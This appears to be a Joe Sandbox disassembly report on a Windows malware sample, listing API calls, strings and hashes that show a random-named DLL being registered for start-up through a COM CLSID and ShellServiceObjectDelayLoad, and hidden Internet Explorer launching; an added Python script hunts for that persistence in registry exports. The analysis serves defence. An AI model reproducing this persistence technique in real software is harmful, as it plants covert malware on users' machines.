                            • Opcode Fuzzy Hash: dd1227ad1f3452ee8fc35f5791aff0d34791abb0994a93554c87423cd4fa6a6f
                            • Instruction Fuzzy Hash: 14116531A00208BAEB216E65CC06F9DB7A8DB00765F108576FA10BA2D1D67DAF018B5D

                            Control-flow Graph

                            APIs
                            • rand.CRTDLL(00000001,69D4CE72,10624DD3), ref: 00403FA7
                            • rand.CRTDLL(00000001,69D4CE72,10624DD3), ref: 00403FD4
                            • rand.CRTDLL(00000001,69D4CE72,10624DD3), ref: 00404010
                            • sprintf.CRTDLL(?,%s\%s.dll,00429080,?,00000001,69D4CE72,10624DD3), ref: 00404048
                            • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000,?,%s\%s.dll,00429080,?,00000001,69D4CE72,10624DD3), ref: 00404063
                            • sprintf.CRTDLL(Nejhbi32,00429080,?,40000000,00000000,00000000,00000002,00000000,00000000,?,%s\%s.dll,00429080,?,00000001,69D4CE72,10624DD3), ref: 00404086
                            • WriteFile.KERNEL32(?,0042AA84,00001A01,?,00000000,Nejhbi32,00429080,?,40000000,00000000,00000000,00000002,00000000,00000000,?,%s\%s.dll), ref: 004040A4
                            • CloseHandle.KERNEL32(?,?,0042AA84,00001A01,?,00000000,Nejhbi32,00429080,?,40000000,00000000,00000000,00000002,00000000,00000000,?), ref: 004040BB
                            • sprintf.CRTDLL(?,CLSID\%s\InProcServer32,{79FEACFF-FFCE-815E-A900-316290B5B738},?,?,0042AA84,00001A01,?,00000000,Nejhbi32,00429080,?,40000000,00000000,00000000,00000002), ref: 004040D3
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1981203140.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1981163808.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1981272347.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1981310007.000000000042E000.00000020.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1981338899.000000000042F000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1981401700.0000000000436000.00000020.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1981476275.0000000000438000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_h879iieoae.jbxd
                            Yara matches
                            Similarity
                            • API ID: randsprintf$File$CloseCreateHandleWrite
                            • String ID: %s\%s.dll$2$3$Apartment$CLSID\%s\InProcServer32$Nejhbi32$Software\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad$ThreadingModel$Web Event Logger${79FEACFF-FFCE-815E-A900-316290B5B738}
                            • API String ID: 4269242784-480674795
                            • Opcode ID: 5b9226bc97ce31b3811795df607ed7bbed4fe58e3f2db61338cee063268ccacc
                            • Instruction ID: 8034dccab87c86b1e0d8b3b5755954c703eafec793446a3a0ea57bc4b4fc6a7a
                            • Opcode Fuzzy Hash: 5b9226bc97ce31b3811795df607ed7bbed4fe58e3f2db61338cee063268ccacc
                            • Instruction Fuzzy Hash: E7415771F482286AD7109769EC46BE97AAC8B49304F5400FBB908F72C1D6FC9E458F69

                            Control-flow Graph

                            APIs
                            • rand.CRTDLL(00000001,69D4CE72,10624DD3,?,?,?,?,00406DCE,?,?,%s\%s.exe,00429080,?,00418D50,00000000), ref: 00403CFD
                            • memcpy.CRTDLL(-0042AA50,?,69D4CE72,10624DD3,?,?,?,?,00406DCE,?,?,%s\%s.exe,00429080,?,00418D50,00000000), ref: 00403D7A
                            • memset.CRTDLL(00406DCE,00000000,0000000C,-0042AA50,?,69D4CE72,10624DD3,?,?,?,?,00406DCE,?,?,%s\%s.exe,00429080), ref: 00403D8F
                            • rand.CRTDLL(?,?,?,?,?,?,?,10624DD3,?,?,?,?,00406DCE,?,?,%s\%s.exe), ref: 00403DF6
                            • rand.CRTDLL(?,?,?,?,?,?,?,10624DD3,?,?,?,?,00406DCE,?,?,%s\%s.exe), ref: 00403DFE
                            • rand.CRTDLL(?,?,?,?,?,?,?,10624DD3,?,?,?,?,00406DCE,?,?,%s\%s.exe), ref: 00403E1F
                            • rand.CRTDLL(?,?,?,?,?,?,?,10624DD3,?,?,?,?,00406DCE,?,?,%s\%s.exe), ref: 00403E27
                            • memcpy.CRTDLL(-0042AA4C,0042AA44,00000040,?,?,?,?,?,?,?,10624DD3,?,?,?,?,00406DCE), ref: 00403E52
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1981203140.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1981163808.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1981272347.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1981310007.000000000042E000.00000020.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1981338899.000000000042F000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1981401700.0000000000436000.00000020.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1981476275.0000000000438000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_h879iieoae.jbxd
                            Yara matches
                            Similarity
                            • API ID: rand$memcpy$memset
                            • String ID: +Z})
                            • API String ID: 1341957784-4018127762
                            • Opcode ID: 2b8c7437e1bd7430af5d83ecd7967c4870ae419bfa933bb167626543e718b489
                            • Instruction ID: df63eb390851271c68cbd719fcc6126871763b87c01c507511359465d0d2d2d2
                            • Opcode Fuzzy Hash: 2b8c7437e1bd7430af5d83ecd7967c4870ae419bfa933bb167626543e718b489
                            • Instruction Fuzzy Hash: A4719E31F042159BCB10CF69DD42A9E7BF5AF88354F584076E901B77A0D23CAA16CBAD

                            Control-flow Graph

                            control_flow_graph 69 404148-404190 RegCreateKeyExA 70 404193-404198 69->70 70->70 71 40419a-4041c2 RegSetValueExA RegCloseKey 70->71
                            APIs
                            • RegCreateKeyExA.ADVAPI32(69D4CE72,00000001,00000000,00000000,00000000,000F003F,00000000,00000000,69D4CE72,00000001,00006A14,{79FEACFF-FFCE-815E-A900-316290B5B738},?,?,?,004040F5), ref: 00404189
                            • RegSetValueExA.ADVAPI32(00000000,?,00000000,00000001,00429080,69D4CE72,69D4CE72,00000001,00000000,00000000,00000000,000F003F,00000000,00000000,69D4CE72,00000001), ref: 004041AB
                            • RegCloseKey.ADVAPI32(00000000,00000000,?,00000000,00000001,00429080,69D4CE72,69D4CE72,00000001,00000000,00000000,00000000,000F003F,00000000,00000000,69D4CE72), ref: 004041B9
                            Strings
                            • {79FEACFF-FFCE-815E-A900-316290B5B738}, xrefs: 0040414D
                            Memory Dump Source
                            • Source File: 00000000.00000002.1981203140.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1981163808.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1981272347.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1981310007.000000000042E000.00000020.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1981338899.000000000042F000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1981401700.0000000000436000.00000020.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1981476275.0000000000438000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_h879iieoae.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseCreateValue
                            • String ID: {79FEACFF-FFCE-815E-A900-316290B5B738}
                            • API String ID: 1818849710-4250702572
                            • Opcode ID: 0b9791cc2bb803e0a6fddded9d2feb4d7971cdb144d1b8de1133cc46446009fc
                            • Instruction ID: 412fd7a6ac4860a679fa2010a2fd1b93dd732dea722ee027fa7473d1befc18ea
                            • Opcode Fuzzy Hash: 0b9791cc2bb803e0a6fddded9d2feb4d7971cdb144d1b8de1133cc46446009fc
                            • Instruction Fuzzy Hash: A7018472B00108BBEB114A95CC02FFEBA6AEF44764F250065FA00B71D1C6B1AE519754
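
                            The two functions above implement the persistence this report flags: a DLL is written into the system directory under a random name (sprintf "%s\%s.dll", CreateFileA, WriteFile), registered as CLSID\{79FEACFF-FFCE-815E-A900-316290B5B738}\InProcServer32 with ThreadingModel "Apartment" (RegCreateKeyExA / RegSetValueExA with type 1, REG_SZ), and listed under Software\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad as "Web Event Logger", so Explorer loads the DLL at start-up. The Python below is an added example for hunting that chain on a host, not code from the Joe Sandbox report or from the sample: it parses `reg export` (.reg) text, resolves every ShellServiceObjectDelayLoad entry to its InProcServer32 DLL and flags entries outside an operator-supplied baseline, entries with no InProcServer32 key, and the CLSID recorded above. It assumes the HKLM hive is what was exported (the report does not show which root key the sample opens). The embedded .reg text is constructed for the demo; the baseline CLSID, its DLL and the name "Xyzzyq32.dll" are placeholders, since the report shows only that the dropped name is random and formatted "%s\%s.dll".

```python
"""Added example: hunt ShellServiceObjectDelayLoad (SSODL) COM persistence in
`reg export` (.reg) text, resolving each entry to its InProcServer32 DLL."""
import re
from typing import Dict, Iterable, List, Optional, Tuple

# Where the report's strings point: the SSODL list Explorer loads at start-up,
# and the CLSID tree that maps each entry to a DLL. Keys are compared lowercased.
SSODL_KEYS = (
    r"hkey_local_machine\software\microsoft\windows\currentversion\shellserviceobjectdelayload",
    r"hkey_local_machine\software\wow6432node\microsoft\windows\currentversion\shellserviceobjectdelayload",
)
CLSID_ROOTS = (
    r"hkey_local_machine\software\classes\clsid",
    r"hkey_local_machine\software\wow6432node\classes\clsid",
    r"hkey_classes_root\clsid",
)
# CLSID the sample writes (from the "CLSID\%s\InProcServer32" sprintf above).
BERBEW_CLSID = "{79FEACFF-FFCE-815E-A900-316290B5B738}"

_KEY_RE = re.compile(r"^\[(.+)\]$")
_VAL_RE = re.compile(r'^(?:@|"((?:[^"\\]|\\.)*)")=(.*)$')


def _unescape(s: str) -> str:
    # .reg escapes a literal backslash as \\ and a quote as \"; drop the escaping backslash.
    return re.sub(r"\\(.)", r"\1", s)


def parse_reg(text: str) -> Dict[str, Dict[str, str]]:
    """Parse .reg text into {lowercased key path: {value name: data}}.
    The default value is stored under ''. Quoted (REG_SZ) data is unescaped;
    dword:/hex: data is kept as the raw text after '='."""
    reg: Dict[str, Dict[str, str]] = {}
    current: Optional[Dict[str, str]] = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";") or line.startswith("Windows Registry Editor"):
            continue
        key = _KEY_RE.match(line)
        if key:
            current = reg.setdefault(key.group(1).lower(), {})
            continue
        val = _VAL_RE.match(line)
        if val and current is not None:
            name = _unescape(val.group(1)) if val.group(1) is not None else ""
            data = val.group(2)
            if len(data) >= 2 and data[0] == '"' and data[-1] == '"':
                data = _unescape(data[1:-1])
            current[name] = data
    return reg


def ssodl_entries(reg: Dict[str, Dict[str, str]]) -> List[Tuple[str, str]]:
    """(display name, CLSID) pairs from every SSODL key present in the export."""
    return [(name, clsid) for key in SSODL_KEYS for name, clsid in reg.get(key, {}).items()]


def resolve_inprocserver32(reg: Dict[str, Dict[str, str]], clsid: str) -> Optional[str]:
    """DLL path registered as the CLSID's in-process server, or None if absent."""
    for root in CLSID_ROOTS:
        values = reg.get(f"{root}\\{clsid.lower()}\\inprocserver32")
        if values and "" in values:
            return values[""]
    return None


def hunt_ssodl(reg_text: str, allowlist: Iterable[str] = ()) -> List[dict]:
    """Flag SSODL entries not in the operator's baseline, entries that point at
    no InProcServer32 (dangling), and the CLSID seen in this report."""
    reg = parse_reg(reg_text)
    allowed = {c.upper() for c in allowlist}
    findings = []
    for name, clsid in ssodl_entries(reg):
        dll = resolve_inprocserver32(reg, clsid)
        reasons = []
        if clsid.upper() == BERBEW_CLSID:
            reasons.append("CLSID matches the Berbew CLSID from this report")
        if clsid.upper() not in allowed:
            reasons.append("CLSID not in baseline allowlist")
        if dll is None:
            reasons.append("no InProcServer32 for this CLSID")
        if reasons:
            findings.append({"name": name, "clsid": clsid, "dll": dll, "reasons": reasons})
    return findings


# Constructed .reg export for the demo (not taken from the sandbox run). The
# baseline CLSID/DLL and the "Xyzzyq32.dll" name are placeholders: the report
# shows only that the dropped name is random, formatted "%s\%s.dll".
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad]
"BaselineObject"="{00000000-0000-0000-0000-000000000001}"
"Web Event Logger"="{79FEACFF-FFCE-815E-A900-316290B5B738}"

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00000000-0000-0000-0000-000000000001}\InProcServer32]
@="C:\\Windows\\System32\\baseline.dll"
"ThreadingModel"="Apartment"

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{79FEACFF-FFCE-815E-A900-316290B5B738}\InProcServer32]
@="C:\\Windows\\System32\\Xyzzyq32.dll"
"ThreadingModel"="Apartment"
'''

if __name__ == "__main__":
    for f in hunt_ssodl(SAMPLE_REG, allowlist=["{00000000-0000-0000-0000-000000000001}"]):
        print(f"{f['name']!r} {f['clsid']} -> {f['dll']}: {'; '.join(f['reasons'])}")
```

                            On a live host, feed it the output of `reg export HKLM\SOFTWARE hklm_software.reg` (decoded from UTF-16) and a baseline allowlist captured from a known-good build of the same Windows version; every SSODL entry that survives the allowlist is worth resolving to its DLL and checking the file's signature and drop time against the CreateFileA/WriteFile activity shown above.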

                            Control-flow Graph

                            control_flow_graph 72 40365e-403682 GetFileSize LocalAlloc 74 403684-40368a 72->74 75 40368c-40368f 72->75 76 403692-4036b2 ReadFile CloseHandle 74->76 75->76
                            APIs
                            • GetFileSize.KERNEL32(00000000,00000000,69D4CE72,80000000,?,00000000,?,00000080,00000000,00000001,297D5A2B,10624DD3,00000001,69D4CE72,10624DD3), ref: 00403667
                            • LocalAlloc.KERNEL32(00000040,-00000010,00000000,00000000,69D4CE72,80000000,?,00000000,?,00000080,00000000,00000001,297D5A2B,10624DD3,00000001,69D4CE72), ref: 00403674
                            • ReadFile.KERNEL32(00000000,10624DD3,00000000,00000000,00000000,00000040,-00000010,00000000,00000000,69D4CE72,80000000,?,00000000,?,00000080,00000000), ref: 0040369A
                            • CloseHandle.KERNEL32(00000000,00000000,10624DD3,00000000,00000000,00000000,00000040,-00000010,00000000,00000000,69D4CE72,80000000,?,00000000,?,00000080), ref: 004036A6
                            Memory Dump Source
                            • Source File: 00000000.00000002.1981203140.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1981163808.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1981272347.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1981310007.000000000042E000.00000020.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1981338899.000000000042F000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1981401700.0000000000436000.00000020.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1981476275.0000000000438000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_h879iieoae.jbxd
                            Yara matches
                            Similarity
                            • API ID: File$AllocCloseHandleLocalReadSize
                            • String ID:
                            • API String ID: 341201350-0
                            • Opcode ID: 2fd491c6994b402e35e8b9e545411a472b55f40d1e3a5e6431fc85953c0e0c00
                            • Instruction ID: f40f052c398d65a7c82f7348c4b70b1bbd35af8546e58ac1d0fc8a8e918c22c0
                            • Opcode Fuzzy Hash: 2fd491c6994b402e35e8b9e545411a472b55f40d1e3a5e6431fc85953c0e0c00
                            • Instruction Fuzzy Hash: 4EF01C76F04504BAEB01ABA58C02BDD77789B04319F108467F604B62C1D27D6B119B6E

                            Control-flow Graph

                            control_flow_graph 78 407980-40798f GetCommandLineA 79 407991-4079a4 strchr 78->79 80 4079b4-4079b9 78->80 81 4079a6-4079a9 79->81 82 4079cf-4079dc GetModuleHandleA call 406c29 79->82 83 4079c0 80->83 84 4079bb-4079be 80->84 85 4079ac-4079af 81->85 89 4079e1-4079e3 82->89 87 4079c3-4079c8 83->87 84->83 86 4079b3 84->86 90 4079b1 85->90 91 4079ab 85->91 86->80 87->82 92 4079ca-4079cd 87->92 90->82 91->85 92->82 93 4079c2 92->93 93->87
                            APIs
                            • GetCommandLineA.KERNEL32(?,?,?,00401284,0042A020,0042A024,0042A028,00000000,00000000), ref: 00407985
                            • strchr.CRTDLL(00000001,00000022,?,?,?,00401284,0042A020,0042A024,0042A028,00000000,00000000), ref: 00407997
                            • GetModuleHandleA.KERNEL32(00000000,?,?,?,00401284,0042A020,0042A024,0042A028,00000000,00000000), ref: 004079D1
                            Memory Dump Source
                            • Source File: 00000000.00000002.1981203140.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1981163808.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1981272347.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1981310007.000000000042E000.00000020.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1981338899.000000000042F000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1981401700.0000000000436000.00000020.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1981476275.0000000000438000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_h879iieoae.jbxd
                            Yara matches
                            Similarity
                            • API ID: CommandHandleLineModulestrchr
                            • String ID:
                            • API String ID: 2139856000-0
                            • Opcode ID: a85f45691ed6f3240fb139f31581347a401a2e524d65f22663fdacfbc6ab9f8e
                            • Instruction ID: bd194e91918afd51b414fff694719a57869652e1cfdb10064340714cce8cfdd4
                            • Opcode Fuzzy Hash: a85f45691ed6f3240fb139f31581347a401a2e524d65f22663fdacfbc6ab9f8e
                            • Instruction Fuzzy Hash: 98F062D1E2C28124FF3162764C4673FAD8A9782754F281477E482F62C2E5BCAD52922B

                            Control-flow Graph

                            control_flow_graph 94 401219 95 40121f-40127f __GetMainArgs call 407980 94->95 97 401284-401293 exit 95->97
                            APIs
                            • __GetMainArgs.CRTDLL(0042A020,0042A024,0042A028,00000000,00000000), ref: 00401262
                              • Part of subcall function 00407980: GetCommandLineA.KERNEL32(?,?,?,00401284,0042A020,0042A024,0042A028,00000000,00000000), ref: 00407985
                              • Part of subcall function 00407980: strchr.CRTDLL(00000001,00000022,?,?,?,00401284,0042A020,0042A024,0042A028,00000000,00000000), ref: 00407997
                              • Part of subcall function 00407980: GetModuleHandleA.KERNEL32(00000000,?,?,?,00401284,0042A020,0042A024,0042A028,00000000,00000000), ref: 004079D1
                            • exit.CRTDLL(00000000), ref: 0040128D
                            Memory Dump Source
                            • Source File: 00000000.00000002.1981203140.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1981163808.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1981272347.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1981310007.000000000042E000.00000020.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1981338899.000000000042F000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1981401700.0000000000436000.00000020.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1981476275.0000000000438000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_h879iieoae.jbxd
                            Yara matches
                            Similarity
                            • API ID: ArgsCommandHandleLineMainModuleexitstrchr
                            • String ID:
                            • API String ID: 735354517-0
                            • Opcode ID: 4cf7b12bb1780c75f300c3ebf2e5b3677e9a846ab4eef9a36478d9a0a8233563
                            • Instruction ID: 1ee26eb31ace3a5089fdf6d32769bdd241f616d51084a453fd18da055c90a8b4
                            • Opcode Fuzzy Hash: 4cf7b12bb1780c75f300c3ebf2e5b3677e9a846ab4eef9a36478d9a0a8233563
                            • Instruction Fuzzy Hash: 52F09670F44300BBDB206F55DD03F167AA8EB08F1CF90002AFA44611D1D67D6420569F

                            Control-flow Graph

                            control_flow_graph 98 40121f-40127f __GetMainArgs call 407980 100 401284-401293 exit 98->100
                            APIs
                            • __GetMainArgs.CRTDLL(0042A020,0042A024,0042A028,00000000,00000000), ref: 00401262
                              • Part of subcall function 00407980: GetCommandLineA.KERNEL32(?,?,?,00401284,0042A020,0042A024,0042A028,00000000,00000000), ref: 00407985
                              • Part of subcall function 00407980: strchr.CRTDLL(00000001,00000022,?,?,?,00401284,0042A020,0042A024,0042A028,00000000,00000000), ref: 00407997
                              • Part of subcall function 00407980: GetModuleHandleA.KERNEL32(00000000,?,?,?,00401284,0042A020,0042A024,0042A028,00000000,00000000), ref: 004079D1
                            • exit.CRTDLL(00000000), ref: 0040128D
                            Memory Dump Source
                            • Source File: 00000000.00000002.1981203140.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1981163808.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1981272347.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1981310007.000000000042E000.00000020.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1981338899.000000000042F000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1981401700.0000000000436000.00000020.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1981476275.0000000000438000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_h879iieoae.jbxd
                            Yara matches
                            Similarity
                            • API ID: ArgsCommandHandleLineMainModuleexitstrchr
                            • String ID:
                            • API String ID: 735354517-0
                            • Opcode ID: 3b2f29dedebab105fe7e3300aa923db6c3c370c5ed425738ec8fc91bc5ecbfbb
                            • Instruction ID: 22fee5bca0d1ee63cc250ffe024ab50772efda8fe48dde45178863df2fdfff2b
                            • Opcode Fuzzy Hash: 3b2f29dedebab105fe7e3300aa923db6c3c370c5ed425738ec8fc91bc5ecbfbb
                            • Instruction Fuzzy Hash: BEF090B0F44300BBDA206F55AC03F1A7AA8EB08B1CFA0002AFA44611E1DA7D6420569F

                            Control-flow Graph

                            APIs
                            • lstrlenA.KERNEL32(?), ref: 00405181
                            • lstrlenA.KERNEL32(?,?), ref: 00405195
                            • lstrlenA.KERNEL32(?,?,?), ref: 004051A6
                            • lstrlenA.KERNEL32(?,?,?,?), ref: 004051C4
                            • lstrlenA.KERNEL32(?,?,?,?,?), ref: 004051D5
                            • lstrlenA.KERNEL32(?,?,?,?,?,?), ref: 004051E6
                            • InterlockedIncrement.KERNEL32(0042C48C), ref: 00405218
                            • memset.CRTDLL(?,00000000,00000010,?,?,?,?,?,?), ref: 0040522E
                            • GetTickCount.KERNEL32 ref: 00405239
                            • srand.CRTDLL(00000000,?,00000000,00000010,?,?,?,?,?,?), ref: 0040523F
                              • Part of subcall function 0040429C: RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 004042D3
                            • LocalFree.KERNEL32(?,?,?,?,?,?,?), ref: 0040526C
                            • ExpandEnvironmentStringsA.KERNEL32(?,?,00000104,?,?,?,?,?,?), ref: 00405290
                            • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,00000104,?,?,?,?,?,?), ref: 004052D4
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1981203140.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1981163808.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1981272347.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1981310007.000000000042E000.00000020.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1981338899.000000000042F000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1981401700.0000000000436000.00000020.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1981476275.0000000000438000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_h879iieoae.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrlen$FreeLocal$CountEnvironmentExpandIncrementInterlockedOpenStringsTickmemsetsrand
                            • String ID: %s%u - Microsoft Internet Explorer$7O{M$D$IEFrame$MicroSoft-Corp$Path$Software\Microsoft\IE Setup\Setup$X-okRecv11$\Iexplore.exe
                            • API String ID: 2987844104-963083691
                            • Opcode ID: a4e079000a0a70f6da611676ee79104fcc8748fed5030838b847c3b90d393ccd
                            • Instruction ID: eaf183550e18aa99804e3b29fd782d62b91feccc71c8544a1a81296d936fe118
                            • Opcode Fuzzy Hash: a4e079000a0a70f6da611676ee79104fcc8748fed5030838b847c3b90d393ccd
                            • Instruction Fuzzy Hash: 8E91B471E092186BDF20EB65CC49BDEB779AF40308F1440F6E208B61D1DAB96EC58F59
                            APIs
                            • lstrlenA.KERNEL32(?), ref: 00405C3C
                            • GetTickCount.KERNEL32 ref: 00405C54
                            • srand.CRTDLL(00000000,?), ref: 00405C5A
                            • InterlockedIncrement.KERNEL32(0042C48C), ref: 00405C69
                            • memset.CRTDLL(?,00000000,00000010,0042C48C,00000000,?), ref: 00405C7F
                              • Part of subcall function 0040429C: RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 004042D3
                            • ExpandEnvironmentStringsA.KERNEL32(?,?,00000104,?,?,?,?,00000000,?), ref: 00405CC2
                              • Part of subcall function 0040570C: GetTempPathA.KERNEL32(00000104,?), ref: 00405730
                              • Part of subcall function 0040570C: strcat.CRTDLL(?,.htm), ref: 00405764
                              • Part of subcall function 0040570C: sprintf.CRTDLL(?,<html>), ref: 00405778
                              • Part of subcall function 0040570C: rand.CRTDLL ref: 00405786
                              • Part of subcall function 0040570C: strcat.CRTDLL(?,0042CC6C), ref: 004057A4
                              • Part of subcall function 0040570C: rand.CRTDLL ref: 004057AC
                              • Part of subcall function 0040570C: rand.CRTDLL ref: 004057BE
                              • Part of subcall function 0040570C: sprintf.CRTDLL(?,%s<!-- %u -->,?), ref: 004057DF
                              • Part of subcall function 0040570C: rand.CRTDLL ref: 004057E7
                              • Part of subcall function 0040570C: strcat.CRTDLL(?,0042CC6C), ref: 00405805
                              • Part of subcall function 0040570C: strcat.CRTDLL(?,<head>), ref: 00405819
                              • Part of subcall function 0040570C: rand.CRTDLL ref: 00405827
                              • Part of subcall function 0040570C: strcat.CRTDLL(?,0042CC6C), ref: 00405845
                              • Part of subcall function 0040570C: rand.CRTDLL ref: 0040584D
                            • strcat.CRTDLL(?,\Iexplore.exe ,?,?,00000104,?,?,?,?,00000000,?), ref: 00405CF7
                            • strcat.CRTDLL(?,?,?,\Iexplore.exe ,?,?,00000104,?,?,?,?,00000000,?), ref: 00405D0A
                              • Part of subcall function 0040431F: GetCurrentThreadId.KERNEL32 ref: 00404341
                              • Part of subcall function 0040431F: GetThreadDesktop.USER32(00000000), ref: 00404347
                            • memset.CRTDLL(?,00000000,00000044,?,?,?,\Iexplore.exe ,?,?,00000104,?,?,?,?,00000000,?), ref: 00405D2B
                            • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 00405D95
                            • CloseHandle.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 00405DA8
                            • sprintf.CRTDLL(?,%s%u - Microsoft Internet Explorer,MicroSoft-Corp,?,?,00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 00405DCA
                            • FindWindowA.USER32(IEFrame,?), ref: 00405DED
                            • Sleep.KERNEL32(000003E8,IEFrame,?,00000000,00000000,00000044,?,?,?,?,?,?,?,?,?,?), ref: 00405DFD
                            • Sleep.KERNEL32(0000F000,IEFrame,?,00000000,00000000,00000044,?,?,?,?,?,?,?,?,?,?), ref: 00405E20
                            • GetWindowTextA.USER32(00000000,?,00000104), ref: 00405E38
                            • CopyFileA.KERNEL32(?,?,00000000), ref: 00405E85
                            • DeleteFileA.KERNEL32(?,?,00000000,?,?,00000000,?,?,0000F000,IEFrame,?,00000000,00000000,00000044,?), ref: 00405EA4
                            • lstrlenA.KERNEL32(<HTML><!--,?,?,00000000,?,?,00000000,?,?,0000F000,IEFrame,?,00000000,00000000,00000044,?), ref: 00405EAE
                            • strncmp.CRTDLL(00000000,<HTML><!--,00000000,<HTML><!--,?,?,00000000,?,?,00000000,?,?,0000F000,IEFrame,?,00000000), ref: 00405EBA
                            • lstrlenA.KERNEL32(<HTML><!--,?,00000000,?,?,00000000,?,?,0000F000,IEFrame,?,00000000,00000000,00000044,?), ref: 00405ECB
                            • LocalFree.KERNEL32(00000000,?,?,?,?,00000000,?,?,00000000,?,?,0000F000,IEFrame,?,00000000,00000000), ref: 00405F0F
                            • DeleteFileA.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 00405F2B
